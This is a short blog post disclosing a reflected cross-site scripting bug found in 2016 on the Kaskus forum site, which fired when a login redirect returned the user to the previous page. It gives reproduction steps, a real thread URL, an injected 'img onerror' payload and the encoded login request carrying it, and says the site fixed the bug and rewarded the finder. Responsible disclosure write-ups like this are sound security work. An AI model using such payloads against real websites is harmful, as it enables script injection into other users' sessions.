XSS On Kaskus

This is old bug i found on 2016, i write this on my new blog to sharing what i found, because i think its bug is very interesting and unique.

Description

This bug is unique, because XSS exposed when redirect to previous page after login.

Step To Reproduce

  • Go to http://www.kaskus.co.id/thread/57a47e691cbfaa092b8b456a/?ref=header&med=header
  • Change parameter to “><img+src%3Dx+onerror%3Dprompt(‘XSS/By/LocalHost’)%3B>
  • Login with widget on top  and you will redirect
  • And XSS will be exposed

Http Header response : 

username=sebutsajanos&password=&md5password=&md5pass
word_utf=&securitytoken=1470955602-
c2079dd69c8f65d455e977727407176b&url=%252Fthread%252F57a47e691cbfaa092b8b456a%252F%25
3Fref%253Dheader%2526med%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror
%25253Dprompt%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E

Video : 

Note :

Kaskus Response is very quick and i got SWAG from them.